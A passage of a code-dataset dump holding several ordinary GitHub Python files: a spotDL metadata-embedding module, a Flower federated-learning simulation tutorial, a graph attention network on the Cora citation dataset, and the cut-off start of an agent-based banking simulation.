"code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 21, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.greeks.analytical.vega", "line_number": 22, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 26, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 65, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.greeks.analytical.vega", "line_number": 67, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 87, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.implied_volatility.implied_volatility", "line_number": 102, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.implied_volatility.implied_volatility", "line_number": 110, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 120, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 122, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.implied_volatility.implied_volatility", "line_number": 123, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 130, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.implied_volatility.implied_volatility", "line_number": 132, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 143, "usage_type": "call"}, {"api_name": "seaborn.relplot", "line_number": 156, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.implied_volatility.implied_volatility", "line_number": 161, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "32305263443", "text": "\"\"\"\nSync Lyrics module for the console\n\"\"\"\n\nimport asyncio\nimport logging\nfrom pathlib import Path\nfrom typing import List\n\nfrom spotdl.download.downloader import Downloader\nfrom spotdl.types.song import Song\nfrom spotdl.utils.ffmpeg import FFMPEG_FORMATS\nfrom spotdl.utils.lrc import generate_lrc\nfrom spotdl.utils.metadata import embed_metadata, get_file_metadata\nfrom spotdl.utils.search import QueryError, get_search_results, reinit_song\n\n__all__ = [\"meta\"]\n\nlogger = logging.getLogger(__name__)\n\n\ndef meta(query: List[str], downloader: Downloader) -> None:\n \"\"\"\n This function applies metadata to the selected songs\n based on the file name.\n If song already has metadata, missing metadata is added\n\n ### Arguments\n - query: list of strings to search for.\n - downloader: Already initialized downloader instance.\n\n ### Notes\n - This function is multi-threaded.\n \"\"\"\n\n # Create a list of all songs from all paths in query\n paths: List[Path] = []\n for path in query:\n test_path = Path(path)\n if not test_path.exists():\n logger.error(\"Path does not exist: %s\", path)\n continue\n\n if test_path.is_dir():\n for out_format in FFMPEG_FORMATS:\n paths.extend(test_path.glob(f\"*.{out_format}\"))\n elif test_path.is_file():\n if test_path.suffix.split(\".\")[-1] not in FFMPEG_FORMATS:\n logger.error(\"File is not a supported audio format: %s\", path)\n continue\n\n paths.append(test_path)\n\n def process_file(file: Path):\n song_meta = get_file_metadata(file, downloader.settings[\"id3_separator\"])\n\n # Check if song has metadata\n # and if it has all the required fields\n # if it has all of these fields, we can assume that the metadata is correct\n if song_meta and not downloader.settings[\"force_update_metadata\"]:\n if (\n song_meta.get(\"artist\")\n and song_meta.get(\"artists\")\n and song_meta.get(\"name\")\n and song_meta.get(\"lyrics\")\n and song_meta.get(\"album_art\")\n ):\n logger.info(\"Song already has metadata: %s\", file.name)\n if downloader.settings[\"generate_lrc\"]:\n lrc_file = file.with_suffix(\".lrc\")\n if lrc_file.exists():\n logger.info(\"Lrc file already exists for %s\", file.name)\n return None\n\n song = Song.from_missing_data(\n name=song_meta[\"name\"],\n artists=song_meta[\"artists\"],\n artist=song_meta[\"artist\"],\n )\n\n generate_lrc(song, file)\n if lrc_file.exists():\n logger.info(\"Saved lrc file for %s\", song.display_name)\n else:\n logger.info(\"Could not find lrc file for %s\", song.display_name)\n\n return None\n\n # Same as above\n if (\n not song_meta\n or None\n in [\n song_meta.get(\"name\"),\n song_meta.get(\"album_art\"),\n song_meta.get(\"artist\"),\n song_meta.get(\"artists\"),\n song_meta.get(\"track_number\"),\n ]\n or downloader.settings[\"force_update_metadata\"]\n ):\n # Song does not have metadata, or it is missing some fields\n # or we are forcing update of metadata\n # so we search for it\n logger.debug(\"Searching metadata for %s\", file.name)\n search_results = get_search_results(file.stem)\n if not search_results:\n logger.error(\"Could not find metadata for %s\", file.name)\n return None\n\n song = search_results[0]\n else:\n # Song has metadata, so we use it to reinitialize the song object\n # and fill in the missing metadata\n try:\n song = reinit_song(Song.from_missing_data(**song_meta))\n except QueryError:\n logger.error(\"Could not find metadata for %s\", file.name)\n return None\n\n # Check if the song has lyric\n # if not use downloader to find lyrics\n if song_meta is None or song_meta.get(\"lyrics\") is None:\n logger.debug(\"Fetching lyrics for %s\", song.display_name)\n song.lyrics = downloader.search_lyrics(song)\n if song.lyrics:\n logger.info(\"Found lyrics for song: %s\", song.display_name)\n else:\n song.lyrics = song_meta.get(\"lyrics\")\n\n # Apply metadata to the song\n embed_metadata(file, song)\n\n logger.info(\"Applied metadata to %s\", file.name)\n\n if downloader.settings[\"generate_lrc\"]:\n lrc_file = file.with_suffix(\".lrc\")\n if lrc_file.exists():\n logger.info(\"Lrc file already exists for %s\", file.name)\n return None\n\n generate_lrc(song, file)\n if lrc_file.exists():\n logger.info(\"Saved lrc file for %s\", song.display_name)\n else:\n logger.info(\"Could not find lrc file for %s\", song.display_name)\n\n return None\n\n async def pool_worker(file_path: Path) -> None:\n async with downloader.semaphore:\n # The following function calls blocking code, which would block whole event loop.\n # Therefore it has to be called in a separate thread via ThreadPoolExecutor. This\n # is not a problem, since GIL is released for the I/O operations, so it shouldn't\n # hurt performance.\n await downloader.loop.run_in_executor(None, process_file, file_path)\n\n tasks = [pool_worker(path) for path in paths]\n\n # call all task asynchronously, and wait until all are finished\n downloader.loop.run_until_complete(asyncio.gather(*tasks))\n", "repo_name": "spotDL/spotify-downloader", "sub_path": "spotdl/console/meta.py", "file_name": "meta.py", "file_ext": "py", "file_size_in_byte": 5995, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13430, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "spotdl.download.downloader.Downloader", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 37, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 39, "usage_type": "call"}, {"api_name": "spotdl.utils.ffmpeg.FFMPEG_FORMATS", "line_number": 45, "usage_type": "name"}, {"api_name": "spotdl.utils.ffmpeg.FFMPEG_FORMATS", "line_number": 48, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 54, "usage_type": "name"}, {"api_name": "spotdl.utils.metadata.get_file_metadata", "line_number": 55, "usage_type": "call"}, {"api_name": "spotdl.types.song.Song.from_missing_data", "line_number": 75, "usage_type": "call"}, {"api_name": "spotdl.types.song.Song", "line_number": 75, "usage_type": "name"}, {"api_name": "spotdl.utils.lrc.generate_lrc", "line_number": 81, "usage_type": "call"}, {"api_name": "spotdl.utils.search.get_search_results", "line_number": 106, "usage_type": "call"}, {"api_name": "spotdl.utils.search.reinit_song", "line_number": 116, "usage_type": "call"}, {"api_name": "spotdl.types.song.Song.from_missing_data", "line_number": 116, "usage_type": "call"}, {"api_name": "spotdl.types.song.Song", "line_number": 116, "usage_type": "name"}, {"api_name": "spotdl.utils.search.QueryError", "line_number": 117, "usage_type": "name"}, {"api_name": "spotdl.utils.metadata.embed_metadata", "line_number": 132, "usage_type": "call"}, {"api_name": "spotdl.utils.lrc.generate_lrc", "line_number": 142, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 150, "usage_type": "name"}, {"api_name": "asyncio.gather", "line_number": 161, "usage_type": "call"}]} +{"seq_id": "7284529662", "text": "import pickle\nfrom pathlib import Path\n\nimport hydra\nfrom hydra.core.hydra_config import HydraConfig\nfrom omegaconf import DictConfig, OmegaConf\n\nimport flwr as fl\n\nfrom dataset import prepare_dataset\nfrom client import generate_client_fn\nfrom server import get_on_fit_config, get_evaluate_fn\n\n\n# A decorator for Hydra. This tells hydra to by default load the config in conf/base.yaml\n@hydra.main(config_path=\"conf\", config_name=\"base\", version_base=None)\ndef main(cfg: DictConfig):\n ## 1. Parse config & get experiment output dir\n print(OmegaConf.to_yaml(cfg))\n # Hydra automatically creates a directory for your experiments\n # by default it would be in /outputs//\n # you can retrieve the path to it as shown below. We'll use this path to\n # save the results of the simulation (see the last part of this main())\n save_path = HydraConfig.get().runtime.output_dir\n\n ## 2. Prepare your dataset\n # When simulating FL workloads we have a lot of freedom on how the FL clients behave,\n # what data they have, how much data, etc. This is not possible in real FL settings.\n # In simulation you'd often encounter two types of dataset:\n # * naturally partitioned, that come pre-partitioned by user id (e.g. FEMNIST,\n # Shakespeare, SpeechCommands) and as a result these dataset have a fixed number\n # of clients and a fixed amount/distribution of data for each client.\n # * and others that are not partitioned in any way but are very popular in ML\n # (e.g. MNIST, CIFAR-10/100). We can _synthetically_ partition these datasets\n # into an arbitrary number of partitions and assign one to a different client.\n # Synthetically partitioned dataset allow for simulating different data distribution\n # scenarios to tests your ideas. The down side is that these might not reflect well\n # the type of distributions encounter in the Wild.\n #\n # In this tutorial we are going to partition the MNIST dataset into 100 clients (the default\n # in our config -- but you can change this!) following a independent and identically distributed (IID)\n # sampling mechanism. This is arguably the simples way of partitioning data but it's a good fit\n # for this introductory tutorial.\n trainloaders, validationloaders, testloader = prepare_dataset(\n cfg.num_clients, cfg.batch_size\n )\n\n ## 3. Define your clients\n # Unlike in standard FL (e.g. see the quickstart-pytorch or quickstart-tensorflow examples in the Flower repo),\n # in simulation we don't want to manually launch clients. We delegate that to the VirtualClientEngine.\n # What we need to provide to start_simulation() with is a function that can be called at any point in time to\n # create a client. This is what the line below exactly returns.\n client_fn = generate_client_fn(trainloaders, validationloaders, cfg.num_classes)\n\n ## 4. Define your strategy\n # A flower strategy orchestrates your FL pipeline. Although it is present in all stages of the FL process\n # each strategy often differs from others depending on how the model _aggregation_ is performed. This happens\n # in the strategy's `aggregate_fit()` method. In this tutorial we choose FedAvg, which simply takes the average\n # of the models received from the clients that participated in a FL round doing fit().\n # You can implement a custom strategy to have full control on all aspects including: how the clients are sampled,\n # how updated models from the clients are aggregated, how the model is evaluated on the server, etc\n # To control how many clients are sampled, strategies often use a combination of two parameters `fraction_{}` and `min_{}_clients`\n # where `{}` can be either `fit` or `evaluate`, depending on the FL stage. The final number of clients sampled is given by the formula\n # ``` # an equivalent bit of code is used by the strategies' num_fit_clients() and num_evaluate_clients() built-in methods.\n # num_clients = int(num_available_clients * self.fraction_fit)\n # clients_to_do_fit = max(num_clients, self.min_fit_clients)\n # ```\n strategy = fl.server.strategy.FedAvg(\n fraction_fit=0.0, # in simulation, since all clients are available at all times, we can just use `min_fit_clients` to control exactly how many clients we want to involve during fit\n min_fit_clients=cfg.num_clients_per_round_fit, # number of clients to sample for fit()\n fraction_evaluate=0.0, # similar to fraction_fit, we don't need to use this argument.\n min_evaluate_clients=cfg.num_clients_per_round_eval, # number of clients to sample for evaluate()\n min_available_clients=cfg.num_clients, # total clients in the simulation\n on_fit_config_fn=get_on_fit_config(\n cfg.config_fit\n ), # a function to execute to obtain the configuration to send to the clients during fit()\n evaluate_fn=get_evaluate_fn(cfg.num_classes, testloader),\n ) # a function to run on the server side to evaluate the global model.\n\n ## 5. Start Simulation\n # With the dataset partitioned, the client function and the strategy ready, we can now launch the simulation!\n history = fl.simulation.start_simulation(\n client_fn=client_fn, # a function that spawns a particular client\n num_clients=cfg.num_clients, # total number of clients\n config=fl.server.ServerConfig(\n num_rounds=cfg.num_rounds\n ), # minimal config for the server loop telling the number of rounds in FL\n strategy=strategy, # our strategy of choice\n client_resources={\n \"num_cpus\": 2,\n \"num_gpus\": 0.0,\n }, # (optional) controls the degree of parallelism of your simulation.\n # Lower resources per client allow for more clients to run concurrently\n # (but need to be set taking into account the compute/memory footprint of your workload)\n # `num_cpus` is an absolute number (integer) indicating the number of threads a client should be allocated\n # `num_gpus` is a ratio indicating the portion of gpu memory that a client needs.\n )\n\n # ^ Following the above comment about `client_resources`. if you set `num_gpus` to 0.5 and you have one GPU in your system,\n # then your simulation would run 2 clients concurrently. If in your round you have more than 2 clients, then clients will wait\n # until resources are available from them. This scheduling is done under-the-hood for you so you don't have to worry about it.\n # What is really important is that you set your `num_gpus` value correctly for the task your clients do. For example, if you are training\n # a large model, then you'll likely see `nvidia-smi` reporting a large memory usage of you clients. In those settings, you might need to\n # leave `num_gpus` as a high value (0.5 or even 1.0). For smaller models, like the one in this tutorial, your GPU would likely be capable\n # of running at least 2 or more (depending on your GPU model.)\n # Please note that GPU memory is only one dimension to consider when optimising your simulation. Other aspects such as compute footprint\n # and I/O to the filesystem or data preprocessing might affect your simulation (and tweaking `num_gpus` would not translate into speedups)\n # Finally, please note that these gpu limits are not enforced, meaning that a client can still go beyond the limit initially assigned, if\n # this happens, your might get some out-of-memory (OOM) errors.\n\n ## 6. Save your results\n # (This is one way of saving results, others are of course valid :) )\n # Now that the simulation is completed, we could save the results into the directory\n # that Hydra created automatically at the beginning of the experiment.\n results_path = Path(save_path) / \"results.pkl\"\n\n # add the history returned by the strategy into a standard Python dictionary\n # you can add more content if you wish (note that in the directory created by\n # Hydra, you'll already have the config used as well as the log)\n results = {\"history\": history, \"anythingelse\": \"here\"}\n\n # save the results as a python pickle\n with open(str(results_path), \"wb\") as h:\n pickle.dump(results, h, protocol=pickle.HIGHEST_PROTOCOL)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "adap/flower", "sub_path": "examples/flower-simulation-step-by-step-pytorch/Part-I/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8402, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3287, "dataset": "github-code", "pt": "61", "api": [{"api_name": "omegaconf.DictConfig", "line_number": 17, "usage_type": "name"}, {"api_name": "omegaconf.OmegaConf.to_yaml", "line_number": 19, "usage_type": "call"}, {"api_name": "omegaconf.OmegaConf", "line_number": 19, "usage_type": "name"}, {"api_name": "hydra.core.hydra_config.HydraConfig.get", "line_number": 24, "usage_type": "call"}, {"api_name": "hydra.core.hydra_config.HydraConfig", "line_number": 24, "usage_type": "name"}, {"api_name": "dataset.prepare_dataset", "line_number": 44, "usage_type": "call"}, {"api_name": "client.generate_client_fn", "line_number": 53, "usage_type": "call"}, {"api_name": "flwr.server.strategy.FedAvg", "line_number": 68, "usage_type": "call"}, {"api_name": "flwr.server", "line_number": 68, "usage_type": "attribute"}, {"api_name": "server.get_on_fit_config", "line_number": 74, "usage_type": "call"}, {"api_name": "server.get_evaluate_fn", "line_number": 77, "usage_type": "call"}, {"api_name": "flwr.simulation.start_simulation", "line_number": 82, "usage_type": "call"}, {"api_name": "flwr.simulation", "line_number": 82, "usage_type": "attribute"}, {"api_name": "flwr.server.ServerConfig", "line_number": 85, "usage_type": "call"}, {"api_name": "flwr.server", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 115, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 124, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 124, "usage_type": "attribute"}, {"api_name": "hydra.main", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "70576710275", "text": "from typing import Dict\n\nimport os\nimport numpy as np\nimport torch\nfrom torch import nn\nimport urllib.request\nimport tarfile\n\nfrom ml_foundations.models.deep_models.layers import GraphAttentionLayer\n\n\nclass CoraDataset:\n \"\"\"\n content [\n ['31336' '0' '0' ... '0' '0' 'Neural_Networks'],\n ['1061127' '0' '0' ... '0' '0' 'Rule_Learning'],\n ...\n ]\n citations [\n [35 1033]\n [35 103482]\n ...\n ]\n \"\"\"\n\n labels: torch.Tensor\n classes: Dict[str, int]\n features: torch.Tensor\n adj_mat: torch.Tensor\n\n @staticmethod\n def _download():\n data_dir = \"./data/\"\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n url = \"https://linqs-data.soe.ucsc.edu/public/lbc/cora.tgz\"\n filename = \"cora.tgz\"\n urllib.request.urlretrieve(url, os.path.join(data_dir, filename))\n with tarfile.open(os.path.join(data_dir, filename), \"r:gz\") as tar:\n tar.extractall(data_dir)\n\n def __init__(self, include_edges: bool = True):\n self.include_edges = include_edges\n self._download()\n content = np.genfromtxt(\"./data/cora/cora.content\", dtype=np.dtype(str))\n citations = np.genfromtxt(\"./data/cora/cora.cites\", dtype=np.int32)\n features = torch.Tensor(np.array(content[:, 1:-1], dtype=np.float32))\n self.features = features / features.sum(dim=1, keepdim=True)\n self.classes = {s: i for i, s in enumerate(set(content[:, -1]))}\n self.labels = torch.tensor(\n [self.classes[i] for i in content[:, -1]], dtype=torch.long\n )\n paper_ids = np.array(content[:, 0], dtype=np.int32)\n ids_to_idx = {id_: i for i, id_ in enumerate(paper_ids)}\n self.adj_mat = torch.eye(len(self.labels), dtype=torch.bool)\n\n if self.include_edges:\n for e in citations:\n e1, e2 = ids_to_idx[e[0]], ids_to_idx[e[1]]\n self.adj_mat[e1][e2] = True\n self.adj_mat[e2][e1] = True\n\n\nclass GAT(nn.Module):\n def __init__(\n self,\n in_features: int,\n n_hidden: int,\n n_classes: int,\n n_heads: int,\n dropout: float,\n ):\n super().__init__()\n self.layer1 = GraphAttentionLayer(\n in_features, n_hidden, n_heads, is_concat=True, dropout=dropout\n )\n self.activation = nn.ELU()\n self.output = GraphAttentionLayer(\n n_hidden, n_classes, 1, is_concat=True, dropout=dropout\n )\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, adj_mat):\n x = self.dropout(x)\n x = self.layer1(x, adj_mat)\n x = self.activation(x)\n x = self.dropout(x)\n return self.output(x, adj_mat)\n\n\ndef accuracy(output: torch.Tensor, labels: torch.Tensor):\n return output.argmax(dim=-1).eq(labels).sum().item() / len(labels)\n\n\ndef main():\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n dataset = CoraDataset(include_edges=True)\n in_features = dataset.features.shape[1]\n n_hidden = 64\n n_classes = len(dataset.classes)\n n_heads = 8\n dropout = 0.6\n model = GAT(in_features, n_hidden, n_classes, n_heads, dropout).to(device)\n epochs = 1000\n optimizer = torch.optim.Adam(model.parameters(), lr=5e-3)\n loss_func = nn.CrossEntropyLoss()\n\n features = dataset.features.to(device)\n labels = dataset.labels.to(device)\n edges_adj = dataset.adj_mat.to(device)\n edges_adj = edges_adj.unsqueeze(-1) # add a third dim for heads\n\n idx_rand = torch.randperm(len(labels))\n idx_train = idx_rand[:500]\n idx_valid = idx_rand[500:]\n\n for epoch in range(epochs):\n model.train()\n optimizer.zero_grad()\n output = model(features, edges_adj)\n loss = loss_func(output[idx_train], labels[idx_train])\n loss.backward()\n optimizer.step()\n train_accuracy = accuracy(output[idx_train], labels[idx_train])\n\n model.eval()\n with torch.no_grad():\n output = model(features, edges_adj)\n val_loss = loss_func(output[idx_valid], labels[idx_valid])\n val_accuracy = accuracy(output[idx_valid], labels[idx_valid])\n\n print(\n f\"epoch {epoch + 1} / {epochs}, train loss: {loss}, train accuracy: {train_accuracy}, valid loss: {val_loss}, valid accuracy: {val_accuracy}\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "akashsonowal/ml-foundations", "sub_path": "ml_foundations/pipelines/tabular/graph_learning/research_paper_classification.py", "file_name": "research_paper_classification.py", "file_ext": "py", "file_size_in_byte": 4491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.Tensor", "line_number": 27, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 36, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 39, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 39, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 39, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.genfromtxt", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.eye", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.bool", "line_number": 56, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "ml_foundations.models.deep_models.layers.GraphAttentionLayer", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.ELU", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "ml_foundations.models.deep_models.layers.GraphAttentionLayer", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 92, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 106, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.randperm", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "12633691501", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy as spy\nfrom scipy.stats import norm\nfrom scipy.optimize import linprog\nimport math\n\n##################################################################################\n\n### global variables\nn_sim = 30\netha = 1\nret_sec_bank = 0.18\nret_sec_bank_sigma = 0.03\nret_sec_shbank = 0.18\nrfree = 0.18\nrfree_min = 0.20\nrfree_max = 0.25\nrfree_vector = [f'{rfree}']\nintrinsic_value = 100\np_market = intrinsic_value + np.random.normal(0)\np_market_old = p_market\np_market_max = 150\np_market_min = 80\np_market_vector = [f'{p_market}']\nret_sec_bank_vector = [f'{ret_sec_bank}']\n\nevery = 0\nevery_thing_vector = [f'{every}']\n\nevery1 = 0\nevery1_thing_vector = [f'{every1}']\n\nevery2 = p_market\nevery2_thing_vector = [f'{every2}']\n\n\n########################################################################\n# defining the agents: banks, shadow banks\n\n\nclass Bank:\n def __init__(self, bank_cash, lend_to_banks, lend_to_loans, bank_sec, deposits, borrow_from_banks, equity,\n alpha_min, provision_per, phi, zeta, car, xs, xbl, xl, etha_max):\n self.bankrupt = False\n self.bank_cash = bank_cash\n self.lend_to_banks = lend_to_banks\n self.lend_to_loans = lend_to_loans\n self.bank_sec = bank_sec\n self.deposits = deposits\n self.borrow_from_banks = borrow_from_banks\n self.equity = equity\n\n self.alpha_min = alpha_min\n self.provision_per = provision_per\n self.zeta = zeta\n self.total_assets = bank_cash + lend_to_banks + lend_to_loans + bank_sec\n self.xs = xs\n self.xbl = xbl\n self.xl = xl\n self.car = car\n self.ret_on_sec = np.random.normal(ret_sec_bank, ret_sec_bank_sigma)\n self.stock = bank_sec / p_market\n self.security_sale = 0\n self.supply_of_stock_b = 0\n self.demand_of_stock_b = 0\n\n ##### income and expense of bank\n self.phi = phi\n self.sigma = phi * (self.deposits + self.equity)\n # self.profit = float(np.random.normal(self.net_income, self.sigma, 1))\n # self.pd = float(norm.ppf((-self.net_income - self.equity) / (self.sigma)))\n self.pd = np.random.beta(1, 20)\n self.etha_max = etha_max\n\n\nclass Shadow_Bank:\n def __init__(self, participation, shadow_bank_cash, security, s_alpha, s_provision):\n self.exit = False\n self.participation = participation\n self.shadow_bank_cash = shadow_bank_cash\n self.security = security\n self.s_alpha = s_alpha\n self.s_provision = s_provision\n self.int_value = np.random.normal(intrinsic_value)\n self.redemption = 0\n self.stock = security / p_market\n\n ##### income and expense of shadow bank\n\n\n###############################################################\n# introduction of Iranian Banks\n\nbank_melli = Bank(2.9, 22.9, 66.3, 33.5, 102.3, 20.2, 3.2, 0.1, 0.1, 0.1, 0.4, 0.07, 0.05, 0.05, 0.05, 1)\nbank_seppah = Bank(0.8, 6, 17.4, 8.8, 14.7, 6.3, 12.1, 0.1, 0.1, 0.1, 0.4, 0.07, 0.05, 0.05, 0.05, 1)\nbank_tosesaderat = Bank(8.3, 3.2, 22.8, 21.5, 5.7, 8.2, 42, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_maskan = Bank(3.4, 0, 54.2, 9.3, 6.9, 9.8, 50.3, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_sanatmadan = Bank(6.7, 0, 106, 18.3, 8.9, 42.7, 79.3, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_keshavarzi = Bank(25.3, 3.2, 88, 47.4, 33.6, 2.1, 128.2, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_tosetavon = Bank(1.3, 0.2, 16.9, 4.4, 5.6, 2.3, 14.8, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_post = Bank(0.6, 4.4, 11.1, 1.3, 13.3, 4, 0.1, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_eghtesadnovin = Bank(4, 6.2, 44, 10.9, 51.1, 7.3, 6.7, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_parsian = Bank(9.5, 27.6, 94.6, 26.4, 33.3, 11.3, 113.5, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_karafarin = Bank(4.8, 7.5, 52.8, 13, 61.3, 8.7, 8.1, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_saman = Bank(0.5, 14.1, 22.6, 18, 46.3, 4.9, 4, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_sina = Bank(2, 2.6, 16, 3.8, 21.6, 0.2, 2.6, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_khavarmiane = Bank(0.2, 5.2, 11.8, 4, 12.7, 5.3, 3.2, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_shahr = Bank(0.8, 9.9, 43.7, 21.4, 85.8, 5.1, -15.1, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_dey = Bank(1, 3.2, 8.2, 15.1, 27.8, 8.4, -8.7, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_saderat = Bank(16.3, 45.5, 204.3, 60.4, 231.3, 41.6, 53.6, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_tejarat = Bank(13.1, 46.4, 133.8, 51.6, 197.6, 22.3, 25, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_mellat = Bank(21.2, 50.8, 311.3, 68.4, 269.6, 127.1, 55, 0.1, 0.1, 0.1, 